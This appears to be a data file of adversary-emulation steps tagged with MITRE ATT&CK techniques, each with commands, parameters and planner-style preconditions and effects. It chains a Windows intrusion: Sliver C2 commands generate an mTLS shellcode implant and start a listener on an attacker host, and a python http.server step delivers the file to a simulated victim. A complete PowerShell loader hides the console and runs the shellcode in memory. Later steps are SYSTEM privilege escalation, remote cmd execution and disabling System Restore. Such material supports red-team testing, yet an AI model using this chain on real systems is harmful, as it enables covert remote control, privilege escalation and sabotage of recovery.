| 2a602f8e-4d1f-49f1-b3b8-4b74f67cb63a |
Build Shellcode for the Sliver implant (for Windows) |
['T1071.001'] |
Manual |
['windows'] |
['Command and Control'] |
['Application Layer Protocol - Web Protocols'] |
The command is used in the Sliver C2 (Command and Control) framework to generate a shellcode payload designed for remote access to a target machine.
|
{'executor': 'Sliver Console', 'command': 'sliver > generate --mtls #{LHOST}:#{LPORT} --os windows --arch 64bit --format shellcode --save #{SAVE_PATH}\nsliver > mtls --lport #{LPORT}\n'} |
{'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the generated payload', 'type': None}} |
['(os_windows ?target - host)', '(unallocated ?p - payload)', '(unallocated ?file - file)'] |
['(sliver_implant_payload ?p - payload ?target - host)', '(shellcode_payload ?p - payload)', '(file_payload ?p - payload ?file - file)', '(bin_blob_file ?file - file)', '(file_prepared_local ?file - file)', '(unallocated ?p - payload)', '(unallocated ?file - file)'] |
| 7480189e-1a4b-45f5-b225-c102915f7262 |
Simulate the victim download a file on its machine |
['T1566.002'] |
Manual |
['windows'] |
['Initial Access'] |
['Phishing: Spearphishing Link'] |
This step simulates the victim accidentally downloads a malicious file by clicking a link. |
{'executor': 'Human', 'command': "(This step needs human interaction and (temporarily) cannot be executed automatically)\n(On attacker's machine)\npython -m http.server\n\n(On victim's machine)\n1. Open #{LHOST}:#{LPORT} in the browser\n2. Navigate to the path of the file on the attacker's machine\n3. Download the file to #{PATH}\n"} |
{'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the downloaded payload', 'type': None}} |
['(file_prepared_local ?file - file)'] |
['(file_exists ?path - path ?file - file ?t - host)'] |
| 0617285b-6005-4a73-83c5-d4dc86fcdc35 |
Simulate the victim executes a shellcode payload (Windows) |
['T1059.001', 'T1620'] |
Manual |
['windows'] |
['Execution', 'Defense Evasion'] |
['Command and Scripting Interpreter: PowerShell', 'Reflective Code Loading'] |
None |
{'executor': 'Human', 'command': '(This step needs human interaction and (temporarily) cannot be executed automatically)\n(On victim's machine, open a powershell and execute these scripts)\n\n$s=[System.IO.File]::ReadAllBytes('#{SAVE_PATH}');\n$c='using System;using System.Runtime.InteropServices;public class W{[DllImport("kernel32")]public static extern IntPtr VirtualAlloc(IntPtr a,uint b,uint c,uint d);[DllImport("kernel32")]public static extern IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr d,uint e,IntPtr f);[DllImport("kernel32")]public static extern uint WaitForSingleObject(IntPtr a,uint b);[DllImport("kernel32.dll")]public static extern IntPtr GetConsoleWindow();[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);}';Add-Type -TypeDefinition $c;$hwnd=[W]::GetConsoleWindow();if($hwnd -ne [IntPtr]::Zero){[W]::ShowWindow($hwnd,0)};\n$p=[W]::VirtualAlloc(0,$s.Length,0x3000,0x40);\n[System.Runtime.InteropServices.Marshal]::Copy($s,0,$p,$s.Length);\n$h=[W]::CreateThread(0,0,$p,0,0,0);[W]::WaitForSingleObject($h,0xFFFFFFFF)\n'} |
{'SAVE_PATH': {'default': None, 'description': 'Saved path of the downloaded shellcode payload file', 'type': None}} |
['(file_exists ?path - path ?file - file ?t - host)', '(bin_blob_file ?file - file)'] |
['(file_executed ?file - file ?t - host)'] |
| 1f401bbe-de24-41d2-8e34-d026e25bfb94 |
Execute a Sliver Implant Payload |
['T1071.001'] |
Sliver |
['windows'] |
['Command and Control'] |
['Application Layer Protocol - Web Protocols'] |
Executing a Sliver implant payload will establish a Sliver session.
|
{'executor': 'None', 'command': 'None\n'} |
None |
['(sliver_implant_payload ?p - payload ?t - host)', '(file_payload ?p - payload ?f - file)', '(file_executed ?f - file ?t - host)', '(unallocated ?s - executor)'] |
['(sliver_session ?s - executor ?t - host)', '~(unallocated ?s - executor)', {'operator': 'When', 'params': {'condition': '(file_executed_as_root ?f - file ?t - host)', 'effect': '(elevated_executor ?s - executor)'}}] |
| 5a1d2b9f-4e7f-8a4d-3f7a-6c2e5e9f9f7c |
Privilege Escalation |
['T1134'] |
Sliver |
['windows'] |
['Privilege Escalation'] |
['Access Token Manipulation'] |
The get_system command attempts to gain SYSTEM-level privileges. |
{'executor': 'Sliver Executor', 'command': 'get_system (#{hosting_process},#{config},#{SessionID})'} |
{'hosting_process': {'description': 'Target process ID or name for privilege escalation'}, 'config': {'description': 'Configuration options for escalation method', 'default': 'Service'}, 'SessionID': {'description': 'The session ID of the active Sliver connection.'}} |
['(os_windows ?target - host)', '(sliver_session ?executorID - executor ?target - host)'] |
['(elevated_executor ?executorID - executor)'] |
| 2074d817-7819-401b-b552-1045672f77f3 |
Execute Command (cmd.exe) |
['T1059.003'] |
Sliver |
['windows'] |
['Execution'] |
['Command and Scripting Interpreter: Windows Command Shell\n'] |
The cmd.exe command executes a Windows command. It runs the specified command on the remote host and returns the result. This command is useful for performing various system tasks. |
{'executor': 'Sliver Executor', 'command': 'cmd(#{SessionID},#{Commands})'} |
{'SessionID': {'description': 'The session ID of the active Sliver connection.'}} |
['(os_windows ?t - host)', '(sliver_session ?s1 - executor ?t - host)'] |
['(command_prompt ?s2 - executor ?t - host)', {'operator': 'When', 'params': {'condition': '(elevated_executor ?s1 - executor)', 'effect': '(elevated_executor ?s2 - executor)'}}] |
| 1c68c68d-83a4-4981-974e-8993055fa034 |
Windows - Disable the SR scheduled task |
['T1490'] |
ART |
['windows'] |
['Impact'] |
['Inhibit System Recovery'] |
Use schtasks.exe to disable the System Restore (SR) scheduled task
|
{'executor': 'Elevated Command Prompt Executor', 'command': 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable\n'} |
None |
['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] |
['(system_restore_disabled ?target - host)'] |